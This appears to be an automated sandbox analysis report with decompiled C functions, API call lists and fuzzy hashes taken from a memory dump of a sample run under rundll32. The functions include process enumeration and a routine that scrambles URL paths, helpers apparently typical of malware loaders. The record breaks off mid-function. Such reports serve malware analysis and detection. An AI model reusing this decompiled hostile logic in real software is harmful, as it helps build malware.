                                          				unsigned int _t33;
                                          				void* _t37;
                                          				unsigned int _t38;
                                          				void* _t41;
                                          				void* _t42;
                                          				int _t45;
                                          				void* _t46;
                                          
                                          				_t42 = __eax;
                                          				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                          				_t38 = __eax;
                                          				_t30 = RtlAllocateHeap( *0x4c0d238, 0, (__eax >> 3) + __eax + 1);
                                          				_v12 = _t30;
                                          				if(_t30 != 0) {
                                          					_v8 = _t42;
                                          					do {
                                          						_t33 = 0x18;
                                          						if(_t38 <= _t33) {
                                          							_t33 = _t38;
                                          						}
                                          						_t21 =  *0x4c0d250; // 0x532ac1ea
                                          						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                          						 *0x4c0d250 = _t23;
                                          						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                          						memcpy(_t30, _v8, _t45);
                                          						_v8 = _v8 + _t45;
                                          						_t27 = _t30 + _t45;
                                          						_t38 = _t38 - _t45;
                                          						_t46 = _t46 + 0xc;
                                          						 *_t27 = 0x2f;
                                          						_t13 = _t27 + 1; // 0x1
                                          						_t30 = _t13;
                                          					} while (_t38 > 8);
                                          					memcpy(_t30, _v8, _t38 + 1);
                                          				}
                                          				return _v12;
                                          			}


















                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04C04DBF,00000000,?,?,04C052FE,?,055895B0), ref: 04C04863
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04C0487B
                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04C04DBF,00000000,?,?,04C052FE,?,055895B0), ref: 04C048BF
                                          • memcpy.NTDLL(00000001,?,00000001), ref: 04C048E0
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: e89ec1079e899449cef3d9f0dd3a11efa45999d1c6b0c8441906faba393674ce
                                          • Instruction ID: bac9ccb6629094263958e940c2bdb07ffb064b1ff3843de2006be15b21a97c29
                                          • Opcode Fuzzy Hash: e89ec1079e899449cef3d9f0dd3a11efa45999d1c6b0c8441906faba393674ce
                                          • Instruction Fuzzy Hash: 51110676A00114AFD318CFA9DC88EAEBBEEDB80350B064276F605DB180E7749E00D764
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 53%
                                          			E04C06AF7(intOrPtr _a4, intOrPtr _a8) {
                                          				char _v20;
                                          				void* _t8;
                                          				void* _t13;
                                          				void* _t16;
                                          				char* _t18;
                                          				void* _t19;
                                          
                                          				_t19 = 0x27;
                                          				_t1 =  &_v20; // 0x74666f53
                                          				_t18 = 0;
                                          				E04C06F89(_t8, _t1);
                                          				_t16 = E04C058BE(_t19);
                                          				if(_t16 != 0) {
                                          					_t3 =  &_v20; // 0x74666f53
                                          					_t13 = E04C09038(_t3, _t16, _a8);
                                          					if(_a4 != 0) {
                                          						__imp__(_a4);
                                          						_t19 = _t13 + 0x27;
                                          					}
                                          					_t18 = E04C058BE(_t19);
                                          					if(_t18 != 0) {
                                          						 *_t18 = 0;
                                          						if(_a4 != 0) {
                                          							__imp__(_t18, _a4);
                                          						}
                                          						__imp__(_t18, _t16);
                                          					}
                                          					E04C0147E(_t16);
                                          				}
                                          				return _t18;
                                          			}










                                          APIs
                                            • Part of subcall function 04C058BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04C01C51), ref: 04C058CA
                                            • Part of subcall function 04C09038: wsprintfA.USER32 ref: 04C09094
                                          • lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,04C02098,74666F53,00000000,?,04C0D00C,?,?), ref: 04C06B2D
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04C06B51
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04C06B59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                          • String ID: Soft
                                          • API String ID: 393707159-3753413193
                                          • Opcode ID: 0bfb62216ed6a28c72896584b99e1756ad660fe5c8f671a500e2bb0fb9d0f57c
                                          • Instruction ID: 24cbe031bd2ec870d79cfe9301f790073803e32b2a1cdb1a0d8f8a2ecf563309
                                          • Opcode Fuzzy Hash: 0bfb62216ed6a28c72896584b99e1756ad660fe5c8f671a500e2bb0fb9d0f57c
                                          • Instruction Fuzzy Hash: 4D012B726001057BE7222FA88C84FEF3B6EDF84349F04C120F90056180DB38DA55DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E04C056A2() {
                                          				char _v264;
                                          				void* _v300;
                                          				int _t8;
                                          				intOrPtr _t9;
                                          				int _t15;
                                          				void* _t17;
                                          
                                          				_t15 = 0;
                                          				_t17 = CreateToolhelp32Snapshot(2, 0);
                                          				if(_t17 != 0) {
                                          					_t8 = Process32First(_t17,  &_v300);
                                          					while(_t8 != 0) {
                                          						_t9 =  *0x4c0d2a4; // 0x97a5a8
                                          						_t2 = _t9 + 0x4c0ee38; // 0x73617661
                                          						_push( &_v264);
                                          						if( *0x4c0d0fc() != 0) {
                                          							_t15 = 1;
                                          						} else {
                                          							_t8 = Process32Next(_t17,  &_v300);
                                          							continue;
                                          						}
                                          						L7:
                                          						CloseHandle(_t17);
                                          						goto L8;
                                          					}
                                          					goto L7;
                                          				}
                                          				L8:
                                          				return _t15;
                                          			}










                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04C056B2
                                          • Process32First.KERNEL32(00000000,?), ref: 04C056C5
                                          • Process32Next.KERNEL32(00000000,?), ref: 04C056F1
                                          • CloseHandle.KERNEL32(00000000), ref: 04C05700
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 420147892-0
                                          • Opcode ID: 8f140e55596a78f0c6d6a75f8500e30211626e91105b5ed8796f3f470d35e700
                                          • Instruction ID: 045dc76a7a4849bc4e924d3f9392ae3b9beea826fd067fd1681b0ecc9301b684
                                          • Opcode Fuzzy Hash: 8f140e55596a78f0c6d6a75f8500e30211626e91105b5ed8796f3f470d35e700
                                          • Instruction Fuzzy Hash: D7F0FC7260113467F710E6769C08EEB76ADDB85344F018051E905C2180E624EE468BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04C07283(void* __esi) {
                                          				struct _SECURITY_ATTRIBUTES* _v4;
                                          				void* _t8;
                                          				void* _t10;
                                          
                                          				_v4 = 0;
                                          				memset(__esi, 0, 0x38);
                                          				_t8 = CreateEventA(0, 1, 0, 0);
                                          				 *(__esi + 0x1c) = _t8;
                                          				if(_t8 != 0) {
                                          					_t10 = CreateEventA(0, 1, 1, 0);
                                          					 *(__esi + 0x20) = _t10;
                                          					if(_t10 == 0) {
                                          						CloseHandle( *(__esi + 0x1c));
                                          					} else {
                                          						_v4 = 1;
                                          					}
                                          				}
                                          				return _v4;
                                          			}







                                          APIs
                                          • memset.NTDLL ref: 04C07291
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 04C072A6
                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04C072B3
                                          • CloseHandle.KERNEL32(?), ref: 04C072C5
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: CreateEvent$CloseHandlememset
                                          • String ID:
                                          • API String ID: 2812548120-0
                                          • Opcode ID: 703fe6d00bf263bd45f6b7f9008615ff94bb1e23ea3bd234a5a1b5aca02a8db6
                                          • Instruction ID: 6f0638f006d6c752a454cd9f2b00a8a0b85bc1f7a35123003f8c3c21b9f136fe
                                          • Opcode Fuzzy Hash: 703fe6d00bf263bd45f6b7f9008615ff94bb1e23ea3bd234a5a1b5aca02a8db6
                                          • Instruction Fuzzy Hash: BDF05EF1205308FFE314AF66DCC4C27BBADFB5129CB12892EF18282151D676B8048A70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E04C0A2EF(int __eax, char _a4) {
                                          				void* _v0;
                                          				void* _t12;
                                          				int _t13;
                                          				int _t14;
                                          
                                          				_t1 =  &_a4; // 0x4d283a53
                                          				_t14 = __eax;
                                          				__imp__( *_t1);
                                          				_t13 = __eax;
                                          				if(__eax > __eax) {
                                          					_t14 = __eax;
                                          				}
                                          				_t2 = _t14 + 1; // 0x1
                                          				_t12 = E04C058BE(_t2);
                                          				if(_t12 != 0) {
                                          					memcpy(_t12, _v0, _t13);
                                          					memset(_t12 + _t13, 0, _t14 - _t13 + 1);
                                          				}
                                          				return _t12;
                                          			}








                                          APIs
                                          • lstrlen.KERNEL32(S:(M,00000000,7748D3B0,?,04C09AA8,00000000,00000005,04C0D00C,00000008,?,?,59935A40,?,?,59935A40), ref: 04C0A2F8
                                          • memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,04C04A8B,?,?,?,4D283A53,?,?), ref: 04C0A31B
                                          • memset.NTDLL ref: 04C0A32A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpymemset
                                          • String ID: S:(M
                                          • API String ID: 4042389641-2217774225
                                          • Opcode ID: 7f03057ddd970c893fca81281a0a8d64e7200b19d000815c6f6a894c3d7a98be
                                          • Instruction ID: 7696b91d5a4e1f6a3651eaac8a53847bdcfacf1ea7cd28aa3e8693cc033c49ba
                                          • Opcode Fuzzy Hash: 7f03057ddd970c893fca81281a0a8d64e7200b19d000815c6f6a894c3d7a98be
                                          • Instruction Fuzzy Hash: 44E02B73A053116BE730AAF95CCCD8F2A9EDBD4254B008935FE15C7244E631DD14C6B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04C078AD() {
                                          				void* _t1;
                                          				intOrPtr _t5;
                                          				void* _t6;
                                          				void* _t7;
                                          				void* _t11;
                                          
                                          				_t1 =  *0x4c0d26c; // 0x40c
                                          				if(_t1 == 0) {
                                          					L8:
                                          					return 0;
                                          				}
                                          				SetEvent(_t1);
                                          				_t11 = 0x7fffffff;
                                          				while(1) {
                                          					SleepEx(0x64, 1);
                                          					_t5 =  *0x4c0d2b8; // 0x0
                                          					if(_t5 == 0) {
                                          						break;
                                          					}
                                          					_t11 = _t11 - 0x64;
                                          					if(_t11 > 0) {
                                          						continue;
                                          					}
                                          					break;
                                          				}
                                          				_t6 =  *0x4c0d26c; // 0x40c
                                          				if(_t6 != 0) {
                                          					CloseHandle(_t6);
                                          				}
                                          				_t7 =  *0x4c0d238; // 0x5190000
                                          				if(_t7 != 0) {
                                          					HeapDestroy(_t7);
                                          				}
                                          				goto L8;
                                          			}









                                          APIs
                                          • SetEvent.KERNEL32(0000040C,00000001,04C06F2D), ref: 04C078B8
                                          • SleepEx.KERNEL32(00000064,00000001), ref: 04C078C7
                                          • CloseHandle.KERNEL32(0000040C), ref: 04C078E8
                                          • HeapDestroy.KERNEL32(05190000), ref: 04C078F8
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: CloseDestroyEventHandleHeapSleep
                                          • String ID:
                                          • API String ID: 4109453060-0
                                          • Opcode ID: 7bc517ffb68d9c0e2ba20733369646d42fb7e2ff0e75072d6ade3f9ea38a4ad1
                                          • Instruction ID: 7f60eb4086499704c67f2dc5524beac32703a2a0c76546bb374e2191064d0be6
                                          • Opcode Fuzzy Hash: 7bc517ffb68d9c0e2ba20733369646d42fb7e2ff0e75072d6ade3f9ea38a4ad1
                                          • Instruction Fuzzy Hash: 8CF03779B0631197F7285A759948B16779EDB057517168710BC01E71C0CB38FD80D560
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 50%
                                          			E04C04C3A(void** __esi) {
                                          				char* _v0;
                                          				intOrPtr _t4;
                                          				intOrPtr _t6;
                                          				void* _t8;
                                          				intOrPtr _t11;
                                          				void* _t12;
                                          				void** _t14;
                                          
                                          				_t14 = __esi;
                                          				_t4 =  *0x4c0d324; // 0x55895b0
                                          				__imp__(_t4 + 0x40);
                                          				while(1) {
                                          					_t6 =  *0x4c0d324; // 0x55895b0
                                          					_t1 = _t6 + 0x58; // 0x0
                                          					if( *_t1 == 0) {
                                          						break;
                                          					}
                                          					Sleep(0xa);
                                          				}
                                          				_t8 =  *_t14;
                                          				if(_t8 != 0 && _t8 != 0x4c0d030) {
                                          					HeapFree( *0x4c0d238, 0, _t8);
                                          				}
                                          				_t14[1] = E04C07C75(_v0, _t14);
                                          				_t11 =  *0x4c0d324; // 0x55895b0
                                          				_t12 = _t11 + 0x40;
                                          				__imp__(_t12);
                                          				return _t12;
                                          			}











                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(05589570), ref: 04C04C43
                                          • Sleep.KERNEL32(0000000A,?,?,?,04C04A8B,?,?,?,4D283A53,?,?), ref: 04C04C4D
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,04C04A8B,?,?,?,4D283A53,?,?), ref: 04C04C75
                                          • RtlLeaveCriticalSection.NTDLL(05589570), ref: 04C04C91
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: 7e0777259e141b7e99e1fa3f31ff1eafb542fce37bc15cf597562e70172fcd40
                                          • Instruction ID: df866c34205f3cc936767a4f39d8d745082887b8530c0493b5a818b9568bdfc2
                                          • Opcode Fuzzy Hash: 7e0777259e141b7e99e1fa3f31ff1eafb542fce37bc15cf597562e70172fcd40
                                          • Instruction Fuzzy Hash: 63F0FE786002409BE7189FA8EA88F1677E9EF14748B06C604F647D7290D728FE80DB19
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E04C09B10() {
                                          				void* _v0;
                                          				void** _t3;
                                          				void** _t5;
                                          				void** _t7;
                                          				void** _t8;
                                          				void* _t10;
                                          
                                          				_t3 =  *0x4c0d324; // 0x55895b0
                                          				__imp__( &(_t3[0x10]));
                                          				while(1) {
                                          					_t5 =  *0x4c0d324; // 0x55895b0
                                          					_t1 =  &(_t5[0x16]); // 0x0
                                          					if( *_t1 == 0) {
                                          						break;
                                          					}
                                          					Sleep(0xa);
                                          				}
                                          				_t7 =  *0x4c0d324; // 0x55895b0
                                          				_t10 =  *_t7;
                                          				if(_t10 != 0 && _t10 != 0x4c0e845) {
                                          					HeapFree( *0x4c0d238, 0, _t10);
                                          					_t7 =  *0x4c0d324; // 0x55895b0
                                          				}
                                          				 *_t7 = _v0;
                                          				_t8 =  &(_t7[0x10]);
                                          				__imp__(_t8);
                                          				return _t8;
                                          			}










                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(05589570), ref: 04C09B19
                                          • Sleep.KERNEL32(0000000A,?,?,?,04C04A8B,?,?,?,4D283A53,?,?), ref: 04C09B23
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,04C04A8B,?,?,?,4D283A53,?,?), ref: 04C09B51
                                          • RtlLeaveCriticalSection.NTDLL(05589570), ref: 04C09B66
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: 85e0e8592a0a65d7eb36ab8f80baf3d41c90a1b684cc332c60bcc19df5629fec
                                          • Instruction ID: 8d6e70cce43b079abf6dfdd85cac70c051e7aa02c18e2f938b9e496eeaed29e9
                                          • Opcode Fuzzy Hash: 85e0e8592a0a65d7eb36ab8f80baf3d41c90a1b684cc332c60bcc19df5629fec
                                          • Instruction Fuzzy Hash: 3BF0DAB86002009BEB288F94D999F2537F6EB18714F068108FA03D7291C638EC80CA11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E04C06B6E(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                          				intOrPtr* _v8;
                                          				void* _t17;
                                          				intOrPtr* _t22;
                                          				void* _t27;
                                          				char* _t30;
                                          				void* _t33;
                                          				void* _t34;
                                          				void* _t36;
                                          				void* _t37;
                                          				void* _t39;
                                          				int _t42;
                                          
                                          				_t17 = __eax;
                                          				_t37 = 0;
                                          				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                          				_t2 = _t17 + 1; // 0x1
                                          				_t28 = _t2;
                                          				_t34 = E04C058BE(_t2);
                                          				if(_t34 != 0) {
                                          					_t30 = E04C058BE(_t28);
                                          					if(_t30 == 0) {
                                          						E04C0147E(_t34);
                                          					} else {
                                          						_t39 = _a4;
                                          						_t22 = E04C0A8D2(_t39);
                                          						_v8 = _t22;
                                          						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                          							_a4 = _t39;
                                          						} else {
                                          							_t26 = _t22 + 2;
                                          							_a4 = _t22 + 2;
                                          							_t22 = E04C0A8D2(_t26);
                                          							_v8 = _t22;
                                          						}
                                          						if(_t22 == 0) {
                                          							__imp__(_t34, _a4);
                                          							 *_t30 = 0x2f;
                                          							 *((char*)(_t30 + 1)) = 0;
                                          						} else {
                                          							_t42 = _t22 - _a4;
                                          							memcpy(_t34, _a4, _t42);
                                          							 *((char*)(_t34 + _t42)) = 0;
                                          							__imp__(_t30, _v8);
                                          						}
                                          						 *_a8 = _t34;
                                          						_t37 = 1;
                                          						 *_a12 = _t30;
                                          					}
                                          				}
                                          				return _t37;
                                          			}















                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,04C0A006,?,?,?,?,00000102,04C066AF,?,?,00000000), ref: 04C06B7A
                                            • Part of subcall function 04C058BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04C01C51), ref: 04C058CA
                                            • Part of subcall function 04C0A8D2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04C06BA8,00000000,00000001,00000001,?,?,04C0A006,?,?,?,?,00000102), ref: 04C0A8E0
                                            • Part of subcall function 04C0A8D2: StrChrA.SHLWAPI(?,0000003F,?,?,04C0A006,?,?,?,?,00000102,04C066AF,?,?,00000000,00000000), ref: 04C0A8EA
                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04C0A006,?,?,?,?,00000102,04C066AF,?), ref: 04C06BD8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04C06BE8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04C06BF4
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3767559652-0
                                          • Opcode ID: 85ce4b1ff7ef7b23a66edde901bcfe0f80c53b280e1f400711d3d03f9a376b7b
                                          • Instruction ID: 2d66f26dc0883cbbe3e184b88d095d239c615cade640ebd02f6b3a61b179cc00
                                          • Opcode Fuzzy Hash: 85ce4b1ff7ef7b23a66edde901bcfe0f80c53b280e1f400711d3d03f9a376b7b
                                          • Instruction Fuzzy Hash: CA21D5B1A04255BFDB115FB4C844A9A7FAADF06394F05C150F9049B241DB35EA50EBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04C05FCB(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                          				void* _v8;
                                          				void* _t18;
                                          				int _t25;
                                          				int _t29;
                                          				int _t34;
                                          
                                          				_t29 = lstrlenW(_a4);
                                          				_t25 = lstrlenW(_a8);
                                          				_t18 = E04C058BE(_t25 + _t29 + _t25 + _t29 + 2);
                                          				_v8 = _t18;
                                          				if(_t18 != 0) {
                                          					_t34 = _t29 + _t29;
                                          					memcpy(_t18, _a4, _t34);
                                          					_t10 = _t25 + 2; // 0x2
                                          					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                          				}
                                          				return _v8;
                                          			}









                                          APIs
                                          • lstrlenW.KERNEL32(004F0053,?,75145520,00000008,0558937C,?,04C0694E,004F0053,0558937C,?,?,?,?,?,?,04C09C10), ref: 04C05FDB
                                          • lstrlenW.KERNEL32(04C0694E,?,04C0694E,004F0053,0558937C,?,?,?,?,?,?,04C09C10), ref: 04C05FE2
                                            • Part of subcall function 04C058BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04C01C51), ref: 04C058CA
                                          • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,04C0694E,004F0053,0558937C,?,?,?,?,?,?,04C09C10), ref: 04C06002
                                          • memcpy.NTDLL(751469A0,04C0694E,00000002,00000000,004F0053,751469A0,?,?,04C0694E,004F0053,0558937C), ref: 04C06015
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpy$AllocateHeap
                                          • String ID:
                                          • API String ID: 2411391700-0
                                          • Opcode ID: ca6ffaf1435e000b7c9e49da1d9a29214585ba19b71da30f2100b42f1b7bfed6
                                          • Instruction ID: 602b2d56b68ce24df4f3aba18a95580c7d5052e23b5a37631f37120f5885ad28
                                          • Opcode Fuzzy Hash: ca6ffaf1435e000b7c9e49da1d9a29214585ba19b71da30f2100b42f1b7bfed6
                                          • Instruction Fuzzy Hash: 2FF03776900118BB9B11EFA8CC89C9F7BADEF082987058062AA04D7201E735EA10DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(?,00000000,00000000,04C05335,616D692F,00000000), ref: 04C09DFB
                                          • lstrlen.KERNEL32(?), ref: 04C09E03
                                            • Part of subcall function 04C058BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04C01C51), ref: 04C058CA
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04C09E1A
                                          • lstrcat.KERNEL32(00000000,?), ref: 04C09E25
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                          • String ID:
                                          • API String ID: 74227042-0
                                          • Opcode ID: a560ccc3d906dcfa3ac16e7e4a1e17039a9e556f20bf1d72073c06381ee296e0
                                          • Instruction ID: 110a6ba6d3010aa89de51b6bf884c1121898ff16ea184e11ef607d12130fbe73
                                          • Opcode Fuzzy Hash: a560ccc3d906dcfa3ac16e7e4a1e17039a9e556f20bf1d72073c06381ee296e0
                                          • Instruction Fuzzy Hash: 6AE04837805621BB87226BA4AC08D8FBFADFF89354B054A15F65093114C735DD15DFD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          Control-flow Graph

                                          C-Code - Quality: 93%
                                          			E043532BA(signed char* __eax, intOrPtr* _a4) {
                                          				signed int _v12;
                                          				void* _v16;
                                          				CHAR* _v20;
                                          				struct _FILETIME _v28;
                                          				void* _v32;
                                          				void* _v36;
                                          				char* _v40;
                                          				signed int _v44;
                                          				long _v344;
                                          				struct _WIN32_FIND_DATAA _v368;
                                          				signed int _t72;
                                          				void* _t74;
                                          				signed int _t76;
                                          				void* _t78;
                                          				intOrPtr _t81;
                                          				CHAR* _t83;
                                          				void* _t85;
                                          				signed char _t89;
                                          				signed char _t91;
                                          				intOrPtr _t93;
                                          				void* _t96;
                                          				long _t99;
                                          				int _t101;
                                          				signed int _t109;
                                          				char* _t111;
                                          				void* _t113;
                                          				int _t119;
                                          				char _t128;
                                          				void* _t134;
                                          				signed int _t136;
                                          				char* _t139;
                                          				signed int _t140;
                                          				char* _t141;
                                          				char* _t146;
                                          				signed char* _t148;
                                          				int _t151;
                                          				void* _t152;
